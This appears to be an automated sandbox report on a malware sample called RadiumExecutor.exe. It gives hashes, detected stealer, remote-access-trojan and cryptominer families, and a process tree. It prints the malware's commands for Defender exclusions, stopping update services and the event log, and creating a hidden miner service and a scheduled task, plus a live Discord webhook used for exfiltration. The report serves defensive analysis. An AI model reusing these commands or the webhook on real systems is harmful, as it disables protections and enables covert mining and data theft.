Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
-
submitted
22-02-2024 10:13
General
-
Target
RadiumExecutor.exe
-
Size
12.6MB
-
MD5
7a17d34bac23e365863ea1da1e42e968
-
SHA1
b5ccab413899349d2821cc2798bce29f0118121f
-
SHA256
571a330dfb82f72878d9ede8bdfc332544446a0160117bf37399c3b9ca0775e2
-
SHA512
c021f26320c49c64831c676820d1bc7cb84ba3f49b798d4f858461eebc398a37d937de1d4cf214b973b8ac1cb693830894c4ae9b1bc7d62f2fd5d56b7d5ba4ac
-
SSDEEP
196608:MRvSjNRyzz9V4EAWzcNtYuZuT0ItZ/jBpOtwDc3rSlou2it3NaB+He+8:MRqjj+xV8acwWuNtZ/jetwc3SYihNqc
Malware Config
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 34 IoCs
-
Growtopia
Growtopa is an opensource modular stealer written in C#.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 9 IoCs
-
Loads dropped DLL 10 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RadiumExecutor.exe"C:\Users\Admin\AppData\Local\Temp\RadiumExecutor.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAawB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAdwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAagB0ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DD5.tmp" /F4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD5dce0c31098e97105ed8d53086c7360c2
SHA1d10d2dc8e33f0bb3efcc0e8704b01b0c9f880c48
SHA256cc9e372e0d228430788eb11e01ed6b5727739da47735615aa833803bdc111d1e
SHA5123345cd2aa2c0e3b90652a35c2e77107758961207b7e074df94fddd9250142476a5fc0706880e55f45f538c5484735ff323917279bc8ea3164bcdf50127772134
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
Filesize
2.2MB
MD5260665eac56899955967b64960f2c89f
SHA12fa1bf2cdba575b0b93b17ca0aaab06bd9b29514
SHA2568b643648bb644e96ce6aa64f13866ec5bd7ceacea823e4846fe2e2cb2d4d3a40
SHA51217df97102047a45861787aa06ee1d84beda0b00755bb8ed948210667e43c65c299265aed43cce91ec77c536f5e6388d664285725ac335b4782784b329dc850bc
-
Filesize
1.7MB
MD53b636058c0028fc708f6e261ceaa27e3
SHA1e3d2a89f513c92256a524b2322ff9a8ea4c69395
SHA256e63241b71d0fa569e9f4001aadc2e9bacb0fb15c1c65ed165d0fe528eb37d1b5
SHA5128974df2cba3174c2982b6b744def22330b9d73fc73e5006ccbd191aed96c26aedb70afb2b0c6e75477020aaf56e09510d580cb24692f33e76a23a0102d3b2aa7
-
Filesize
1.5MB
MD55f7ca3c83702edee95276dd90cc0cd4a
SHA1e414a2de3f78f9d2df46f8388d610fc477e58d05
SHA256c05acdad0628535a70527d01bbfab5b1909bb3cd783b6f11657a055bee5600c0
SHA512af1f5acc5ab1c3172ff177bcb6bbbb7c680535b26d0f4b17acb906211c4307ea6e8e5022a72b781177568c6cd8088e5758c407594f54dd37db3e984a8f58437e
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
316KB
MD5675d9e9ab252981f2f919cf914d9681d
SHA17485f5c9da283475136df7fa8b62756efbb5dd17
SHA2560f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA5129dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
SHA11e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763
-
Filesize
5.0MB
MD5e222309197c5e633aa8e294ba4bdcd29
SHA152b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA5129eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503
-
Filesize
1.1MB
MD5aa0c18f48a0e2dee6ec6b86cb32e29a5
SHA1bbe28055bb4a084dbecde7ee3c0cf6acd6b39529
SHA256ad4dfbeb31753f4923c01ad2170dc26947264b18eba06a785e51cf7ac05bb768
SHA5123df9f72e5ccbee25da91b4a6734cf6f82e96798ed2c199057970270c43db12566f13b9828c8838b6a6baaf878e4e222b3fcc8fd29dad4d501f619764b5b5514f
-
Filesize
4.5MB
MD50ab1cfa3c5a286261a61a6ecc40da80a
SHA18b6918c2b4b18ca3d9550d39a18000f8f77bf5e5
SHA2563e81a62c399dbdb3fdf54c0c14cfe4e9232ce0498be869278a40e2e0f7269ce2
SHA5129c94909399a64bf625d2688f75bc68e4871dbc0ea711f3adde9a8b4304919f6acf034a9b22f77c68ac910fa6f5ae6e8431ccb8da935a4ecf0a0ac5305c24a111
-
Filesize
2.1MB
MD58d16c1f81e77df946d538f8e791c56a4
SHA1ab4d2e5262e37249386ebc8d7acef94dfece0664
SHA256a102436f6bd4b0d3acf717ca122cd3877cda0822df24bd8f7bd8b5910b254fe8
SHA512282cdd2f2acb9f2f5f69c16458699f385ee2c82152419d8b41042dda9b0beecedb0f0a3d9945b112720dba9d347e8ba9c255103efcf6aae8ec27ca0aa762f808
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
9.9MB
-
Filesize
336KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
256KB
-
Filesize
216KB
-
Filesize
404KB
-
Filesize
6.9MB
-
Filesize
404KB
-
Filesize
6.9MB
-
Filesize
404KB
-
Filesize
432KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
256KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB